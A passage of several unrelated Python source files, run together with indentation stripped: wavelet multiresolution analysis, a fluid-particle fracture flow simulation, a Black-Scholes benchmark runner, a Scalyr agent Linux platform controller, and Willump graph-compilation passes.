tmp[0] = wav_coeffs[0]
# reconstruct
rec = inverse(tmp)
if rec.shape != data.shape:
# trim any excess coefficients
rec = rec[tuple([slice(sz) for sz in data.shape])]
mra_coeffs.append(rec)
# restore zeros
tmp[0] = z
for j in range(1, nc):
dcoeffs = {}
dkeys = list(wav_coeffs[j].keys())
for k in dkeys:
# tmp has arrays of zeros except for the jth entry
z = tmp[j][k]
tmp[j][k] = wav_coeffs[j][k]
# tmp[j]['a' * len(k)] = z
# reconstruct
rec = inverse(tmp)
if rec.shape != data.shape:
# trim any excess coefficients
rec = rec[tuple([slice(sz) for sz in data.shape])]
dcoeffs[k] = rec
# restore zeros
tmp[j][k] = z
# tmp[j].pop('a' * len(k))
mra_coeffs.append(dcoeffs)
return mra_coeffs
def imran(mra_coeffs):
"""Inverse nD multiresolution analysis via summation.
Parameters
----------
mra_coeffs : list
Multiresolution analysis coefficients as returned by `mra2`.
Returns
-------
rec : ndarray
The reconstructed signal.
See Also
--------
mran
References
----------
.. [1] <NAME> and <NAME>. Analysis of Subtidal
Coastal Sea Level Fluctuations Using Wavelets. Journal of the American
Statistical Association Vol. 92, No. 439 (Sep., 1997), pp. 868-880.
https://doi.org/10.2307/2965551
"""
rec = mra_coeffs[0]
for j in range(1, len(mra_coeffs)):
for k, v in mra_coeffs[j].items():
rec += v
return rec
|
import math
import numpy as np
from matplotlib import pyplot as plt
import root_finder
import random
import pylab
class ProblemParameters:
def __init__(self):
self.L0 = 0.01
self.H0 = 0.005
self.U0 = 0.31297739987328533717
self.epsilon = self.H0 / self.L0
self.A1 = 0.001
self.A2 = 0.001
self.DeltaX = self.L0 / 2
self.n_points = 1000
self.n_streamlines = 12
self.n_periods = 1
self.Omega = 2 * math.pi / self.L0 * self.n_periods
self.n_particles = 1000
self.delta_0 = (self.A1 + self.A2) / (2 * self.H0)
self.alpha = 2 * math.pi * self.DeltaX / self.L0
#self.alpha = self.DeltaX
self.gamma = (self.A2 - self.A1) / (self.A2 + self.A1)
self.cos_semi_alpha = math.cos(0.5 * self.alpha)
self.sin_semi_alpha = math.sin(0.5 * self.alpha)
self.eta_values = []
self.randoms_horizontal = []
self.randoms_vertical = []
self.vels_horizontal = []
self.vels_vertical = []
self.accelerations_horizontal = []
self.accelerations_vertical = []
self.x_points = []
self.phi_1 = []
self.phi_2 = []
self.delta_alpha = self.delta_0 * math.sin(self.alpha / 2)
self.h3 = 8 * (1 + self.delta_alpha ** 2) / (1 - 4 * self.delta_alpha ** 2) ** 2.5
self.J_h = 16 * math.pi ** 2 * self.delta_alpha ** 2 / (1 - 4 * self.delta_alpha ** 2) ** 1.5
self.J_phi = 16 * math.pi ** 2 * (self.delta_0 ** 2 - self.delta_alpha ** 2) * (1 + 8 * self.delta_alpha ** 2) / (1 - 4 * self.delta_alpha ** 2) ** 2.5
self.J_phi_h = self.gamma * self.J_h
self.beta = self.J_phi_h / self.J_h
# Plotting options
self.plot_arrows = False
def SetNonGeometricParameters(self, a, rho_p, rho_f, nu, gz):
self.a = a
self.rho = rho_p / rho_f
self.nu = nu
self.R = 2.0 / (2 * self.rho + 1)
self.tau = 2.0 / 9 * self.a ** 2 / self.nu / self.L0
self.Fr = self.U0 ** 2 / (self.L0 * gz)
self.Gz = 1. / self.Fr
self.gamma_z = 8. * self.Gz / (9 * self.epsilon * self.J_h)
self.h_and_phi_function = h_and_phi_function(self)
def PrintParameters(self):
print('tau = ', self.tau)
print('R = ', self.R)
print('epsilon = ', self.epsilon)
print('delta_0 = ', self.delta_0)
print('h3 = ', self.h3)
print('J_h = ', self.J_h)
print('J_phi = ', self.J_phi)
print('J_phi = ', self.J_phi)
print('J_phi_h = ', self.J_phi_h)
print('beta = ', self.beta)
print('gamma_z = ', self.gamma_z)
def Phi1(pp, X):
return - 0.5 * pp.H0 + pp.A1 * math.sin(pp.Omega * X - 0.5 * pp.alpha)
def Phi2(pp, X):
return 0.5 * pp.H0 + pp.A2 * math.sin(pp.Omega * X + 0.5 * pp.alpha)
class HorizontalDistributionMinusObjective:
def __init__(self, pp, L0, H0, A1, A2, DeltaX):
self.Omega = pp.Omega
self.H0 = pp.H0
self.DeltaX = DeltaX
self.A1 = pp.A1
self.A2 = pp.A2
self.C_phase = (A2 - A1) * math.cos(0.5 * DeltaX)
self.C = 1.0 / (H0 * L0 + 1.0 / pp.Omega * (A1 * math.cos(pp.Omega * L0 - 0.5 * DeltaX) - A2 * math.cos(pp.Omega * L0 + 0.5 * DeltaX) + self.C_phase))
def SetObjective(self, x):
self.x = x
def f(self, y):
return self.C * (self.H0 * y + 1.0 / self.Omega * (self.A1 * math.cos(self.Omega * y - 0.5 * self.DeltaX) - self.A2 * math.cos(self.Omega * y + 0.5 * self.DeltaX) + self.C_phase)) - self.x
def df(self, y):
return self.C * (self.H0 - self.A1 * math.sin(self.Omega * y - 0.5 * self.DeltaX) + self.A2 * math.sin(self.Omega * y + 0.5 * self.DeltaX))
class h_and_phi_function:
def __init__(self, pp):
self.Omega = pp.Omega
self.L0 = pp.L0
self.sin_semi_alpha = pp.sin_semi_alpha
self.cos_semi_alpha = pp.cos_semi_alpha
self.delta_0 = pp.delta_0
self.gamma = pp.gamma
self.OmegaL0 = self.Omega * self.L0
def f(self, x):
arg = self.OmegaL0 * x
c_arg = math.cos(arg)
s_arg = math.sin(arg)
phi = self.delta_0 * ( s_arg * self.cos_semi_alpha + self.gamma * c_arg * self.sin_semi_alpha)
phidx = self.OmegaL0 * self.delta_0 * ( c_arg * self.cos_semi_alpha - self.gamma * s_arg * self.sin_semi_alpha)
phidx2 = self.OmegaL0 ** 2 * self.delta_0 * (- s_arg * self.cos_semi_alpha - self.gamma * c_arg * self.sin_semi_alpha)
phidx3 = self.OmegaL0 ** 3 * self.delta_0 * (- c_arg * self.cos_semi_alpha + self.gamma * s_arg * self.sin_semi_alpha)
h = 0.5 + self.delta_0 * ( c_arg * self.sin_semi_alpha + self.gamma * s_arg * self.cos_semi_alpha)
hdx = self.OmegaL0 * self.delta_0 * (- s_arg * self.sin_semi_alpha + self.gamma * c_arg * self.cos_semi_alpha)
hdx2 = self.OmegaL0 ** 2 * self.delta_0 * (- c_arg * self.sin_semi_alpha - self.gamma * s_arg * self.cos_semi_alpha)
hdx3 = self.OmegaL0 ** 3 * self.delta_0 * ( s_arg * self.sin_semi_alpha - self.gamma * c_arg * self.cos_semi_alpha)
return phi, phidx, phidx2, phidx3, h, hdx, hdx2, hdx3
def f_phi_h(self, x):
arg = self.OmegaL0 * x
c_arg = math.cos(arg)
s_arg = math.sin(arg)
phi = self.delta_0 * ( s_arg * self.cos_semi_alpha + self.gamma * c_arg * self.sin_semi_alpha)
h = 0.5 + self.delta_0 * ( c_arg * self.sin_semi_alpha + self.gamma * s_arg * self.cos_semi_alpha)
return phi, h
def z_to_eta(pp, x, z):
phi, h = pp.h_and_phi_function.f_phi_h(x)
eta = (z - phi) / h
return x, eta
def eta_to_z(pp, x, eta):
phi, h = pp.h_and_phi_function.f_phi_h(x)
z = eta * h + phi
return x, z
def mod_eta_to_z(pp, x, eta):
phi, h = pp.h_and_phi_function.f_phi_h(x)
z = pp.epsilon * (eta * h + phi)
return x, z
def velocity_order_1(pp, x, eta):
phi, phidx, phidx2, phidx3, h, hdx, hdx2, hdx3 = pp.h_and_phi_function.f(x)
h_inv = 1.0 / h
etadx = - (phidx + eta * hdx) * h_inv
etadx2 = h_inv ** 2 * (2 * eta * hdx ** 2 + 2 * hdx * phidx - eta * h * hdx2 - h * phidx2)
etadx3 = h_inv ** 3 * (- 6 * eta * hdx ** 3 - 6 * hdx ** 2 * phidx + 6 * eta * h * hdx * hdx2 + 3 * phidx * h * hdx2 + 3 * h * hdx * phidx2 - h ** 2 * eta * hdx3 - h ** 2 * phidx3)
one_minus_eta_2 = (1.0 - eta ** 2)
UX = 0.75 * pp.U0 * h_inv * one_minus_eta_2
UZ = - 0.75 * pp.U0 * pp.epsilon * etadx * one_minus_eta_2
uxdx = - 0.75 * h_inv ** 2 * (2 * eta * etadx * h + one_minus_eta_2 * hdx)
uxdz = - 1.5 * eta * h_inv ** 2
uzdx = 0.75 * (2 * eta * etadx ** 2 - etadx2 * one_minus_eta_2)
uxdx2 = 0.75 * h_inv ** 3 * ((2 - 12 * eta ** 2) * hdx ** 2 - 12 * eta * hdx * phidx - 2 * phidx ** 2 + h * ((3 * eta ** 2 - 1) * hdx2 + 2 * eta * phidx2))
uzdz2 = - 1.5 * h_inv ** 2 * (2 * hdx * h_inv * eta - etadx)
uxdx3 = 0.75 * h_inv ** 4 * (hdx ** 3 * (60 * eta ** 2 - 6) + 72 * eta * hdx ** 2 * phidx + 6 * hdx * (3 * phidx ** 2 + h * (hdx2 * (1 - 6 * eta ** 2) - 3 * eta * phidx2)) + h * (- 6 * phidx * phidx2 - h * hdx3 + 3 * h * eta ** 2 * hdx3 + 2 * eta * (- 9 * phidx * etadx2 + h * phidx3)))
uxdx2z = 1.5 * h_inv ** 4 * (- 6 * hdx * phidx + 3 * eta * (- 4 * hdx ** 2 + h * hdx2) + h * phidx2)
uxdxz2 = 4.5 * h_inv ** 4 * hdx
UXdX = pp.U0 / pp.L0 * uxdx
UZdX = pp.U0 * pp.epsilon / pp.L0 * uzdx
UXdZ = pp.U0 / pp.H0 * uxdz
UZdZ = - UXdX
DUX = UX * UXdX + UZ * UXdZ
DUZ = UX * UZdX + UZ * UZdZ
DUX2 = pp.U0 / pp.L0 ** 2 * uxdx2
DUZ2 = - pp.U0 / (pp.L0 * pp.H0) * uzdz2
DUX3 = pp.U0 / pp.L0 ** 3 * uxdx3
DUX2Z = pp.U0 / (pp.L0 ** 2 * pp.H0) * uxdx2z
DUZ2X = - DUX2Z
DUZ3 = - pp.U0 / (pp.L0 * pp.H0 ** 2) * uxdxz2
CONV_DERIV_LAPL_X = UX * DUX3 + UZ * DUX2Z
CONV_DERIV_LAPL_Z = UX * DUZ2X + UZ * DUZ3
FAXEN_DRAG_X = pp.a ** 2 / 6 * DUX2
FAXEN_DRAG_Z = pp.a ** 2 / 6 * DUZ2
FAXEN_ADDED_MASS_X = pp.a ** 2 / 30 * CONV_DERIV_LAPL_X
FAXEN_ADDED_MASS_Z = pp.a ** 2 / 30 * CONV_DERIV_LAPL_Z
UX += FAXEN_DRAG_X
UZ += FAXEN_DRAG_Z
DUX += FAXEN_DRAG_X
DUZ += FAXEN_DRAG_Z
return UX, UZ, DUX, DUZ, DUX2, DUZ2
def GetFlowVariables(pp, i, X, Z):
x, eta = z_to_eta(pp, X / pp.L0, Z / pp.H0)
UX, UZ, DUX, DUZ, DUX2, DUZ2 = velocity_order_1(pp, x, eta)
D = min(abs(Phi1(pp, X) - Z), abs(Phi2(pp, X) - Z))
pp.randoms_horizontal[i] = X
pp.randoms_vertical[i] = Z
pp.vels_horizontal[i] = UX
pp.vels_vertical[i] = UZ
pp.accelerations_horizontal[i] = DUX
pp.accelerations_vertical[i] = DUZ
return UX, UZ, DUX, DUZ, DUX2, DUZ2, D
def GenerateRandomPositions(pp, n_particles):
pp.x_points = np.linspace(0, pp.L0, pp.n_points)
pp.x_points = [x for x in pp.x_points]
pp.phi_1 = [Phi1(pp, x) for x in pp.x_points]
pp.phi_2 = [Phi2(pp, x) for x in pp.x_points]
pp.n_particles = n_particles
randoms_horizontal_guesses = np.random.uniform(0, 1.0 , n_particles)
objective_function = HorizontalDistributionMinusObjective(pp, pp.L0, pp.H0, pp.A1, pp.A2, pp.DeltaX)
pp.randoms_horizontal = [0.0 for i in range(n_particles)]
pp.randoms_vertical = [0.0 for i in range(n_particles)]
pp.vels_horizontal = [0.0 for i in range(n_particles)]
pp.vels_vertical = [0.0 for i in range(n_particles)]
pp.accelerations_horizontal = [0.0 for i in range(n_particles)]
pp.accelerations_vertical = [0.0 for i in range(n_particles)]
i_value = 0
for value in randoms_horizontal_guesses:
objective_function.SetObjective(value)
corrected_value = root_finder.FindRootBisection(objective_function, value)
pp.randoms_horizontal[i_value] = corrected_value
pp.randoms_vertical[i_value] = np.random.uniform(Phi1(pp, corrected_value), Phi2(pp, corrected_value))
i_value += 1
# Streamlines
pp.eta_values = np.linspace(-1, 1, pp.n_streamlines)
pp.eta_values = [value for value in pp.eta_values]
pp.eta_values = pp.eta_values[1:-1]
def GetPositionAndFlowVariables(pp, i):
X = pp.randoms_horizontal[i]
Z = pp.randoms_vertical[i]
UX, UZ, DUX, DUZ, DUX2, DUZ2, D = GetFlowVariables(pp, i, X, Z)
return X, Z, UX, UZ, DUX, DUZ, D
def PrintResult(pp, time):
for value in pp.eta_values:
streamline_Z_values = [pp.H0 * eta_to_z(pp, x / pp.L0, value)[1] for x in pp.x_points]
plt.plot(pp.x_points, streamline_Z_values, color = 'b', linestyle = 'dashed')
eta_critical = 0.245806
streamline_Z_values = [-pp.L0 * mod_eta_to_z(pp, x / pp.L0, eta_critical)[1] for x in pp.x_points]
plt.plot(pp.x_points, streamline_Z_values, color = 'r')
plt.scatter(pp.randoms_horizontal, pp.randoms_vertical)
for i in range(pp.n_particles):
X = pp.randoms_horizontal[i]
Z = pp.randoms_vertical[i]
UX, UZ, DUX, DUZ, DUX2, DUZ2, D = GetFlowVariables(pp, i, X, Z)
pp.vels_horizontal[i] = UX
pp.vels_vertical[i] = UZ
pp.accelerations_horizontal[i] = DUX
pp.accelerations_vertical[i] = DUZ
if pp.plot_arrows:
acc_moduli_inv = [1.0 / math.sqrt(pp.accelerations_horizontal[i] ** 2 + pp.accelerations_vertical[i] ** 2) for i in range(pp.n_particles)]
acc_max_modul_inv = min(acc_moduli_inv)
acc_size_coeff = acc_max_modul_inv * 0.25 * pp.H0
for i in range(pp.n_particles):
X = pp.randoms_horizontal[i]
Z = pp.randoms_vertical[i]
DUX = pp.accelerations_horizontal[i]
DUZ = pp.accelerations_vertical[i]
UX = pp.vels_horizontal[i]
UZ = pp.vels_vertical[i]
pylab.arrow(X, Z, UX * acc_size_coeff * 10, UZ * acc_size_coeff * 10, fc = "k", ec = "k", width = 0.001 * pp.H0, head_width = 0.02 * pp.H0, head_length = 0.04 * pp.H0)
plt.axis('equal')
plt.plot(pp.x_points, pp.phi_1, color='k', linewidth=2)
plt.plot(pp.x_points, pp.phi_2, color='k', linewidth=2)
plt.savefig('fracture_' + str(time) + '.png', bbox_inches='tight')
plt.close()
|
# Copyright (C) 2017-2018 Intel Corporation
#
# SPDX-License-Identifier: MIT
import os
import run_utils as utils
import numpy as np
from dpbench_datagen.blackscholes import gen_data_to_file, gen_rand_data
from dpbench_python.blackscholes.bs_python import black_scholes_python
# make xrange available in python 3
try:
xrange
except NameError:
xrange = range
def ip_data_to_file(nopt):
gen_data_to_file(nopt)
def gen_data_np(nopt):
price, strike, t = gen_rand_data(nopt)
return (
price,
strike,
t,
np.zeros(nopt, dtype=np.float64),
-np.ones(nopt, dtype=np.float64),
)
RISK_FREE = 0.1
VOLATILITY = 0.2
# create input data, call blackscholes computation function (alg)
def run(name, sizes=14, step=2, nopt=2 ** 15):
import argparse
parser = argparse.ArgumentParser()
parser.add_argument(
"--steps", required=False, default=sizes, help="Number of steps"
)
parser.add_argument(
"--step", required=False, default=step, help="Factor for each step"
)
parser.add_argument(
"--size", required=False, default=nopt, help="Initial data size"
)
parser.add_argument(
"--repeat", required=False, default=1, help="Iterations inside measured region"
)
parser.add_argument(
"--usm",
required=False,
action="store_true",
help="Use USM Shared or pure numpy",
)
parser.add_argument(
"--test",
required=False,
action="store_true",
help="Check for correctness by comparing output with naieve Python version",
)
args = parser.parse_args()
sizes = int(args.steps)
step = int(args.step)
nopt = int(args.size)
repeat = int(args.repeat)
clean_string = ["make", "clean"]
utils.run_command(clean_string, verbose=True)
if args.usm:
build_string = ["make", "comp"]
utils.run_command(build_string, verbose=True)
exec_name = "./black_scholes_comp"
else:
build_string = ["make"]
utils.run_command(build_string, verbose=True)
exec_name = "./black_scholes"
if args.test:
# run sequential python
price, strike, t, p_call, p_put = gen_data_np(nopt)
black_scholes_python(
nopt, price, strike, t, RISK_FREE, VOLATILITY, p_call, p_put
)
# run dpcpp
ip_data_to_file(nopt)
run_cmd = [exec_name, str(nopt), str(1), "-t"]
utils.run_command(run_cmd, verbose=True)
# read output of dpcpp into n_call, n_put
n_call = np.fromfile("call.bin", np.float64)
# read output of dpcpp into n_call, n_put
n_put = np.fromfile("put.bin", np.float64)
# compare outputs
if np.allclose(n_call, p_call) and np.allclose(n_put, p_put):
print("Test succeeded\n")
else:
print("Test failed\n")
return
if os.path.isfile("runtimes.csv"):
os.remove("runtimes.csv")
for i in xrange(sizes):
# generate input data
ip_data_to_file(nopt)
# run the C program
run_cmd = [exec_name, str(nopt), str(repeat)]
utils.run_command(run_cmd, verbose=True)
nopt *= step
repeat -= step
if repeat < 1:
repeat = 1
if __name__ == "__main__":
run("Blackscholes dpcpp")
|
# Copyright 2014 Scalyr Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ------------------------------------------------------------------------
#
# author: <NAME> <<EMAIL>>
__author__ = "<EMAIL>"
import os
from sys import platform as _platform
from scalyr_agent.json_lib import JsonObject
from scalyr_agent.platform_posix import PosixPlatformController
from scalyr_agent.platform_controller import DefaultPaths
from __scalyr__ import get_install_root, TARBALL_INSTALL, DEV_INSTALL, PACKAGE_INSTALL
class LinuxPlatformController(PosixPlatformController):
"""The platform controller for Linux platforms.
This is based on the general Posix platform but also adds in Linux-specific monitors to run.
"""
def __init__(self, stdin="/dev/null", stdout="/dev/null", stderr="/dev/null"):
"""Initializes the POSIX platform instance.
"""
PosixPlatformController.__init__(
self, stdin=stdin, stdout=stdout, stderr=stderr
)
def can_handle_current_platform(self):
"""Returns true if this platform object can handle the server this process is running on.
@return: True if this platform instance can handle the current server.
@rtype: bool
"""
return _platform.lower().startswith("linux")
@property
def default_paths(self):
"""Returns the default paths to use for various configuration options for this platform.
@return: The default paths
@rtype: DefaultPaths
"""
if self._install_type == PACKAGE_INSTALL:
return DefaultPaths(
"/var/log/scalyr-agent-2",
"/etc/scalyr-agent-2/agent.json",
"/var/lib/scalyr-agent-2",
)
elif self._install_type == TARBALL_INSTALL:
install_location = get_install_root()
return DefaultPaths(
os.path.join(install_location, "log"),
os.path.join(install_location, "config", "agent.json"),
os.path.join(install_location, "data"),
)
else:
assert self._install_type == DEV_INSTALL
# For developers only. We default to a directory ~/scalyr-agent-dev for storing
# all log/data information, and then require a log, config, and data subdirectory in each of those.
base_dir = os.path.join(os.path.expanduser("~"), "scalyr-agent-dev")
return DefaultPaths(
os.path.join(base_dir, "log"),
os.path.join(base_dir, "config", "agent.json"),
os.path.join(base_dir, "data"),
)
def get_default_monitors(self, config):
"""Returns the default monitors to use for this platform.
This method should return a list of dicts containing monitor configuration options just as you would specify
them in the configuration file. The list may be empty.
@param config The configuration object to use.
@type config configuration.Configuration
@return: The default monitors
@rtype: list<dict>
"""
result = []
if config.implicit_metric_monitor:
result.append(
JsonObject(module="scalyr_agent.builtin_monitors.linux_system_metrics")
)
if config.implicit_agent_process_metrics_monitor:
result.append(
JsonObject(
module="scalyr_agent.builtin_monitors.linux_process_metrics",
pid="$$",
id="agent",
)
)
return result
|
import ast
import copy
import math
import typing
from collections import OrderedDict
from typing import MutableMapping, List, Set, Tuple, Mapping, Optional
from willump import *
from willump.graph.array_count_vectorizer_node import ArrayCountVectorizerNode
from willump.graph.array_tfidf_node import ArrayTfIdfNode
from willump.graph.cascade_point_early_exit_node import CascadePointEarlyExitNode
from willump.graph.hash_join_node import WillumpHashJoinNode
from willump.graph.identity_node import IdentityNode
from willump.graph.pandas_column_selection_node import PandasColumnSelectionNode
from willump.graph.pandas_column_selection_node_python import PandasColumnSelectionNodePython
from willump.graph.pandas_dataframe_concatenation_node import PandasDataframeConcatenationNode
from willump.graph.pandas_series_concatenation_node import PandasSeriesConcatenationNode
from willump.graph.pandas_to_dense_matrix_node import PandasToDenseMatrixNode
from willump.graph.reshape_node import ReshapeNode
from willump.graph.stack_dense_node import StackDenseNode
from willump.graph.stack_sparse_node import StackSparseNode
from willump.graph.willump_graph import WillumpGraph
from willump.graph.willump_graph_node import WillumpGraphNode
from willump.graph.willump_input_node import WillumpInputNode
from willump.graph.willump_model_node import WillumpModelNode
from willump.graph.willump_python_node import WillumpPythonNode
from willump.willump_utilities import *
def topological_sort_graph(graph: WillumpGraph) -> List[WillumpGraphNode]:
# Adjacency list representation of the Willump graph (arrows point from nodes to their inputs).
forward_graph: MutableMapping[WillumpGraphNode, List[WillumpGraphNode]] = {}
# Adjacency list representation of the reverse of the Willump graph (arrows point from nodes to their outputs).
reverse_graph: MutableMapping[WillumpGraphNode, List[WillumpGraphNode]] = {}
# Use DFS to build the forward and reverse graphs.
node_stack: List[WillumpGraphNode] = [graph.get_output_node()]
nodes_seen: Set[WillumpGraphNode] = set()
while len(node_stack) > 0:
current_node: WillumpGraphNode = node_stack.pop()
forward_graph[current_node] = copy.copy(current_node.get_in_nodes())
if current_node not in reverse_graph:
reverse_graph[current_node] = []
for node in current_node.get_in_nodes():
if node not in reverse_graph:
reverse_graph[node] = []
reverse_graph[node].append(current_node)
if node not in nodes_seen:
nodes_seen.add(node)
node_stack.append(node)
# List of sources of reverse graph.
reverse_graph_sources: List[WillumpGraphNode] = []
for node, outputs in forward_graph.items():
if len(outputs) == 0:
reverse_graph_sources.append(node)
# The nodes, topologically sorted. Use Kahn's algorithm.
sorted_nodes: List[WillumpGraphNode] = []
while len(reverse_graph_sources) > 0:
current_node = reverse_graph_sources.pop()
sorted_nodes.append(current_node)
while len(reverse_graph[current_node]) > 0:
node = reverse_graph[current_node].pop()
forward_graph[node].remove(current_node)
if len(forward_graph[node]) == 0:
reverse_graph_sources.append(node)
return sorted_nodes
def push_back_python_nodes_pass(sorted_nodes: List[WillumpGraphNode]) -> List[WillumpGraphNode]:
"""
Greedily push Python nodes and input nodes back towards the start of the sorted_nodes list while maintaining
topological sorting. This maximizes the length of Weld blocks.
"""
for i in range(len(sorted_nodes)):
if isinstance(sorted_nodes[i], WillumpPythonNode) or isinstance(sorted_nodes[i], WillumpInputNode):
python_node = sorted_nodes[i]
input_names: List[str] = python_node.get_in_names()
good_index: int = i
for j in range(i - 1, 0 - 1, -1):
if any(output_name in input_names for output_name in sorted_nodes[j].get_output_names()):
break
else:
good_index = j
sorted_nodes.remove(python_node)
sorted_nodes.insert(good_index, python_node)
return sorted_nodes
def find_dataframe_base_node(df_node: WillumpGraphNode,
nodes_to_base_map: MutableMapping[WillumpGraphNode, WillumpHashJoinNode]) \
-> WillumpHashJoinNode:
"""
If a model's input contains a sequence of independent joins of metadata onto the same table of data,
identify the first join onto that data table.
"""
if df_node in nodes_to_base_map:
return nodes_to_base_map[df_node]
base_discovery_node = df_node
join_cols_set = set()
touched_nodes = []
while True:
assert (isinstance(base_discovery_node, WillumpHashJoinNode))
for entry in base_discovery_node.join_col_names:
join_cols_set.add(entry)
touched_nodes.append(base_discovery_node)
base_left_input = base_discovery_node.get_in_nodes()[0]
if isinstance(base_left_input, WillumpHashJoinNode) and not any(
join_col_name in base_left_input.right_df_row_type.column_names for join_col_name in join_cols_set):
base_discovery_node = base_left_input
else:
break
for df_node in touched_nodes:
nodes_to_base_map[df_node] = base_discovery_node
assert (isinstance(base_discovery_node, WillumpHashJoinNode))
return base_discovery_node
def model_input_identification_pass(sorted_nodes: List[WillumpGraphNode]) -> None:
"""
Identify the model, if there is one, in a program. Set its model inputs. Do not modify the nodes in
any other way.
Assumption: There is one model in the program.
"""
nodes_to_base_map: MutableMapping[WillumpGraphNode, WillumpGraphNode] = {}
for node in sorted_nodes:
if isinstance(node, WillumpModelNode):
model_node = node
break
else:
return
# A stack containing the next nodes we want to examine and what their indices are in the model.
current_node_stack: List[Tuple[WillumpGraphNode, Tuple[int, int], Optional[Mapping[str, int]]]] = \
[(model_node.get_in_nodes()[0], (0, model_node.input_width), None)]
model_inputs: MutableMapping[WillumpGraphNode, typing.Union[Tuple[int, int], Mapping[str, int]]] = {}
while len(current_node_stack) > 0:
input_node, (index_start, index_end), curr_selection_map = current_node_stack.pop()
if isinstance(input_node, ArrayCountVectorizerNode) or isinstance(input_node, ArrayTfIdfNode):
model_inputs[input_node] = (index_start, index_end)
elif isinstance(input_node, StackSparseNode):
stack_start_index = index_start
for stacked_node in input_node.get_in_nodes():
try:
output_width = stacked_node.output_width
except AttributeError:
assert (len(stacked_node.get_output_types()) == 1)
node_output_type = stacked_node.get_output_types()[0]
assert (isinstance(node_output_type, WeldCSR))
output_width = node_output_type.width
current_node_stack.append(
(stacked_node, (stack_start_index, stack_start_index + output_width), curr_selection_map))
stack_start_index += output_width
elif isinstance(input_node, StackDenseNode):
stack_start_index = index_start
for stacked_node in input_node.get_in_nodes():
try:
output_width = stacked_node.output_width
except AttributeError:
assert (len(stacked_node.get_output_types()) == 1)
node_output_type = stacked_node.get_output_types()[0]
assert (isinstance(node_output_type, WeldVec))
output_width = node_output_type.width
current_node_stack.append(
(stacked_node, (stack_start_index, stack_start_index + output_width), curr_selection_map))
stack_start_index += output_width
elif isinstance(input_node, PandasColumnSelectionNode) \
or isinstance(input_node, PandasColumnSelectionNodePython):
selected_columns: List[str] = input_node.selected_columns
assert (len(selected_columns) == index_end - index_start)
selection_map: Mapping[str, int] = {col: index_start + i for i, col in enumerate(selected_columns)}
selection_input = input_node.get_in_nodes()[0]
current_node_stack.append((selection_input, (index_start, index_end), selection_map))
elif isinstance(input_node, PandasSeriesConcatenationNode) \
or isinstance(input_node, PandasDataframeConcatenationNode):
for node_input_node, input_type in zip(input_node.get_in_nodes(), input_node.input_types):
node_map = {}
for col in curr_selection_map.keys():
if col in input_type.column_names:
node_map[col] = curr_selection_map[col]
current_node_stack.append((node_input_node, (index_start, index_end), node_map))
elif isinstance(input_node, WillumpHashJoinNode):
join_left_columns = input_node.left_df_type.column_names
join_right_columns = input_node.right_df_row_type.column_names
output_columns = join_left_columns + join_right_columns
if curr_selection_map is None:
curr_selection_map = {col: index_start + i for i, col in enumerate(output_columns)}
join_base_node = find_dataframe_base_node(input_node, nodes_to_base_map)
pushed_map = {}
next_map = {}
for col in curr_selection_map.keys():
if col in join_right_columns:
pushed_map[col] = curr_selection_map[col]
else:
next_map[col] = curr_selection_map[col]
join_left_input = input_node.get_in_nodes()[0]
model_inputs[input_node] = pushed_map
if join_base_node is not input_node:
current_node_stack.append((join_left_input, (index_start, index_end), next_map))
else:
if len(next_map) > 0:
model_inputs[join_left_input] = next_map
elif isinstance(input_node, IdentityNode) or isinstance(input_node, ReshapeNode) \
or isinstance(input_node, PandasToDenseMatrixNode):
node_input_node = input_node.get_in_nodes()[0]
current_node_stack.append((node_input_node, (index_start, index_end), curr_selection_map))
elif isinstance(input_node, WillumpInputNode) or isinstance(input_node, WillumpPythonNode):
if curr_selection_map is not None:
if len(curr_selection_map) > 0:
model_inputs[input_node] = curr_selection_map
else:
model_inputs[input_node] = (index_start, index_end)
else:
panic("Unrecognized node found when processing model inputs %s" % input_node.__repr__())
assert(all(len(v) > 0 for v in model_inputs.values()))
model_node.set_model_inputs(model_inputs)
return
def weld_pandas_marshalling_pass(weld_block_input_set: Set[str], weld_block_output_set: Set[str],
typing_map: Mapping[str, WeldType], batch) \
-> Tuple[List[WillumpPythonNode], List[WillumpPythonNode]]:
"""
Processing pass creating Python code to marshall Pandas into a representation (struct of vec columns) Weld can
understand, then convert that struct back to Pandas.
# TODO: Reconstruct the original index properly.
"""
pandas_input_processing_nodes: List[WillumpPythonNode] = []
pandas_post_processing_nodes: List[WillumpPythonNode] = []
if not batch: # TODO: This is a hack, fix it
return pandas_input_processing_nodes, pandas_post_processing_nodes
for input_name in weld_block_input_set:
input_type = typing_map[input_name]
if isinstance(input_type, WeldPandas):
df_temp_name = "%s__df_temp" % input_name
# Strip line numbers from variable name.
stripped_input_name = strip_linenos_from_var(input_name)
pandas_glue_python_args = ""
for column, field_type in zip(input_type.column_names, input_type.field_types):
if isinstance(field_type, WeldVec) and isinstance(field_type.elemType, WeldStr):
pandas_glue_python_args += "list(%s['%s'].values)," % (stripped_input_name, column)
else:
pandas_glue_python_args += "%s['%s'].values," % (stripped_input_name, column)
pandas_glue_python = "%s, %s = (%s), %s" % (
stripped_input_name, df_temp_name, pandas_glue_python_args, stripped_input_name)
pandas_glue_ast: ast.Module = \
ast.parse(pandas_glue_python, "exec")
pandas_input_node = WillumpPythonNode(python_ast=pandas_glue_ast.body[0], input_names=[],
output_names=[input_name], output_types=[], in_nodes=[])
pandas_input_processing_nodes.append(pandas_input_node)
reversion_python = "%s = %s" % (stripped_input_name, df_temp_name)
reversion_python_ast = ast.parse(reversion_python, "exec")
reversion_python_node = WillumpPythonNode(python_ast=reversion_python_ast.body[0],
input_names=[df_temp_name],
output_names=[stripped_input_name], output_types=[], in_nodes=[])
if stripped_input_name not in map(strip_linenos_from_var, weld_block_output_set):
pandas_post_processing_nodes.append(reversion_python_node)
for output_name in weld_block_output_set:
output_type = typing_map[output_name]
stripped_output_name = strip_linenos_from_var(output_name)
if isinstance(output_type, WeldPandas):
df_creation_arguments = ""
for i, column_name in enumerate(output_type.column_names):
df_creation_arguments += "'%s' : %s[%d]," % (column_name, stripped_output_name, i)
df_creation_statement = "%s = pd.DataFrame({%s})" % (stripped_output_name, df_creation_arguments)
df_creation_ast: ast.Module = \
ast.parse(df_creation_statement, "exec")
